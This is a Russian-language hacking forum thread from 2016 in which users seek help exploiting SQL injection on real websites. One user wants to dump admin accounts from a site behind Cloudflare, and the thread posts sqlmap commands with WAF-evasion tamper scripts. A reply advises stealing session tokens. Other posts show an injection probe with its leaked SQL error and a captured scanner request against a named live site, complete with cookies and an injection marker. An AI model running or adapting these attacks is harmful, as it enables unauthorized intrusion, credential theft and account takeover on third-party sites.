ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.04.2016, 16:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
3412
Репутация:
5
|
|
Такая печаль ребята,
Нашел тайм байсед блинд скуль на одном саенте, там стоит ваф клоудфлейр. заюзал темпер скрипты, все слиается-подбирается, все хорошо. НО при попытке слить из таблицы юзеров -- админ акки, или вообще пересчитать колонки этой таблицы -- получаю 503 еррор. Прокси юзал.
Кто сталкивался? Как решить?
Код:
Code:
./sqlmap.py -r site.hed -D db -T user --count -v 3 --tamper="between,randomcase,space2comment" --random-agent --no-cast --time-sec=10
Код:
Code:
[DEBUG] got HTTP error code: 503 (Service Unavailable)
|
|
|
|
04.04.2016, 16:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от adawdadw
adawdadw said:
↑
Такая печаль ребята,
Нашел тайм байсед блинд скуль на одном саенте, там стоит ваф клоудфлейр. заюзал темпер скрипты, все слиается-подбирается, все хорошо. НО при попытке слить из таблицы юзеров -- админ акки, или вообще пересчитать колонки этой таблицы -- получаю 503 еррор. Прокси юзал.
Кто сталкивался? Как решить?
Код:
Code:
./sqlmap.py -r site.hed -D db -T user --count -v 3 --tamper="between,randomcase,space2comment" --random-agent --no-cast --time-sec=10
Код:
Code:
[DEBUG] got HTTP error code: 503 (Service Unavailable)
таблица юзеров вся не читается или только админские акки?
можно копипаст запрос-ответа от -v 3 ?
-------------
на таблицу юзеров могут права другие быть, для нее отдельный мускуль пользователь например создан
файлы не читаются?
|
|
|
|
04.04.2016, 17:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
3412
Репутация:
5
|
|
Сообщение от t0ma5
t0ma5 said:
↑
таблица юзеров вся не читается или только админские акки?
можно копипаст запрос-ответа от -v 3 ?
-------------
на таблицу юзеров могут права другие быть, для нее отдельный мускуль пользователь например создан
файлы не читаются? Не, файлы не читаются. Конкретной из этой таблицы имена колонок могу получить, поля -- нет, из других могу.
|
|
|
|
04.04.2016, 18:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
вангую что доступа таки нет, скрипт валится с ошибок access denied, отсюда 503
------------------
чекни есть ли таблица с сессиями, иногда пасс и не нужен, можно тиснуть сессию
|
|
|
|
05.04.2016, 12:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
65956
Репутация:
0
|
|
как запустить поиск колонки в ручную?то есть пишу salt ssalt и т.д
|
|
|
|
05.04.2016, 20:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
37430
Репутация:
0
|
|
если я правильно тебя понял то sqlmap -u site -D твоя бд --search salt и т.д
|
|
|
|
06.04.2016, 04:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
3216
Репутация:
0
|
|
Подскажите, что можно выжать из ситуации:
запрос: www.site.com/search?searchword=lala"+AND+9815%3D8835
Ответ: No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2)' at line 11 SQL=SELECT a.client, a.client_id, a.id, a.type_id, a.user_id, a.title, rc.catid, "*" AS text, a.ctime AS created, "2" AS browsernav, IF( s.name != "", CONCAT("Type: ", t.name, " | " , " Section: ", s.name, " | " , " Category: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ), CONCAT("Type: ", t.name, " | " , " Section: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ) ) AS section FROM jos_js_res_record AS a LEFT JOIN jos_js_res_types AS t ON t.id = a.type_id LEFT JOIN jos_js_res_record_category AS rc ON rc.record_id = a.id LEFT JOIN jos_js_res_category AS c ON c.id = rc.catid LEFT JOIN jos_js_res_category AS s ON s.id = c.section_id LEFT JOIN jos_js_res_record_values AS rv ON rv.record_id = a.id LEFT JOIN jos_js_res_fields AS f ON f.id = rv.field_id WHERE ((a.title like "%lala"%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) AND ((a.title like "%9815=8835%" OR (rv.field_value like "%9815=8835%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) GROUP BY a.id LIMIT 0, 50
Сразу задам второй вопрос: в параметре search ограничение 20 символов. Проверка происходит на стороне сервера. Есть пусти обхода?
SQLmap не видит, что параметр уязвим. |
|
|
|
07.04.2016, 22:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
65956
Репутация:
0
|
|
Сообщение от ghost8
ghost8 said:
↑
если я правильно тебя понял то sqlmap -u site -D твоя бд --search salt и т.д Это поиск таблиц,мне надо колонки
|
|
|
|
08.04.2016, 02:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
37430
Репутация:
0
|
|
Только проверял все он ищет,выводит таблицу,а потом выводит колонку.
|
|
|
|
10.04.2016, 20:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
65956
Репутация:
0
|
|
Сообщение от ghost8
ghost8 said:
↑
POST / HTTP/1.1
Content-Length: 1439
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_TFWLMOFXSC
Referer:
http://www.admir.kz/
Cookie: bestbuyplanet=201607042017315d3489f5e81da776b9e9e1 fad1808e87; astratop=1; s=1; ruid=Nq0eBkuZBldOBQAAAexeag==; top100rb=NjczKzY3Ng==; _ym_uid=1460050539758942208; yabs-vdrf=A0; _ym_isad=2; VISID=TTEFYBEBKWRPXCLTMU; _ym_visorc_13406191=w
Host:
www.admir.kz
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="BannerPlace"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="category"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="contenttype"
ResourceOffer
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="filterMode"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="location"
kazakhstan
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="next"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="orderby"
1'"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="page"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="PageName"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="pagesMethod"
post
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="PageTitle"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="ResourceCategoryGroup"
ad
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="ResourceCategoryID"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="SID"
classifieds
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="treeType"
-------AcunetixBoundary_TFWLMOFXSC--
Response
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Thu, 07 Apr 2016 22:56:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Cache-Control: no-cache, private, no-store, must-revalidate, proxy-revalidate, max-stale=0, post-check=0, pre-check=0, max-age=0, s-maxage=0
Pragma: no-cache
Original-Content-Encoding: gzip
Content-Length: 48275
Error message found:
You have an error in your SQL syntax
Пробую вот так:
sqlmap.py -r "C:\site.txt" --random-ag
В site.txt :
POST / HTTP/1.1
Content-Length: 1439
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_TFWLMOFXSC
Referer: http://www.admir.kz/
Cookie: bestbuyplanet=201607042017315d3489f5e81da776b9e9e1 fad1808e87; astratop=1; s=1; ruid=Nq0eBkuZBldOBQAAAexeag==; top100rb=NjczKzY3Ng==; _ym_uid=1460050539758942208; yabs-vdrf=A0; _ym_isad=2; VISID=TTEFYBEBKWRPXCLTMU; _ym_visorc_13406191=w
Host: www.admir.kz
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="BannerPlace"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="category"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="contenttype"
ResourceOffer
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="filterMode"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="location"
kazakhstan
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="next"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="orderby*"
1'"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="page"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="PageName"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="pagesMethod"
post
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="PageTitle"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="ResourceCategoryGroup"
ad
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="ResourceCategoryID"
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="SID"
classifieds
-------AcunetixBoundary_TFWLMOFXSC
Content-Disposition: form-data; name="treeType"
-------AcunetixBoundary_TFWLMOFXSC--
Не находит sql что делаю не так?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
